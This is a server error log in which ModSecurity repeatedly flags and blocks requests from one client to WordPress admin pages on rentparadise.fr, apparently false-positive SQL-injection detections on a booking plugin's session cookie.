[Mon May 11 22:25:21.849418 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7MXo_DFxNSZVmaX3PeQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:21.849710 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7MXo_DFxNSZVmaX3PeQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:22.418655 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7MXo_DFxNSZVmaX3PeQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:22.635031 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Mno_DFxNSZVmaX3PewAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:22.635344 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Mno_DFxNSZVmaX3PewAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:23.002844 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Mno_DFxNSZVmaX3PewAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:23.837834 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7M3o_DFxNSZVmaX3PfQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:23.838136 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7M3o_DFxNSZVmaX3PfQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:24.443644 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7M3o_DFxNSZVmaX3PfQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:24.850202 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7NHo_DFxNSZVmaX3PfwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:24.850497 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7NHo_DFxNSZVmaX3PfwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:25.454037 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7NHo_DFxNSZVmaX3PfwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:25.852875 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7NXo_DFxNSZVmaX3PgQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:25.853180 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7NXo_DFxNSZVmaX3PgQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:26.573075 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7NXo_DFxNSZVmaX3PgQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:27.451602 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7N3o_DFxNSZVmaX3PjAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:27.451896 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7N3o_DFxNSZVmaX3PjAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:28.034129 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7N3o_DFxNSZVmaX3PjAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:28.235902 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7OHo_DFxNSZVmaX3PjQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:28.236198 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7OHo_DFxNSZVmaX3PjQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:28.842021 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7OHo_DFxNSZVmaX3PjQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:29.140226 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7OXo_DFxNSZVmaX3PjwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:29.140537 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7OXo_DFxNSZVmaX3PjwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:29.515309 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7OXo_DFxNSZVmaX3PjwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:30.140191 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7Ono_DFxNSZVmaX3PkQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:30.140486 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7Ono_DFxNSZVmaX3PkQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:30.654966 2026] [authz_core:error] [pid 1601130:tid 1601154] [client 47.128.23.24:17816] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Auth/error_log
[Mon May 11 22:25:30.762395 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Ono_DFxNSZVmaX3PkQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:31.142315 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7O3o_DFxNSZVmaX3PkwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:31.142607 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7O3o_DFxNSZVmaX3PkwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:31.774073 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7O3o_DFxNSZVmaX3PkwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:32.241221 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7PHo_DFxNSZVmaX3PlAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:32.241505 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7PHo_DFxNSZVmaX3PlAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:32.824999 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7PHo_DFxNSZVmaX3PlAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:33.231700 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7PXo_DFxNSZVmaX3PlgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:33.231980 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7PXo_DFxNSZVmaX3PlgAAANA"], referer: https://rentparadise.fr/wp-login.php
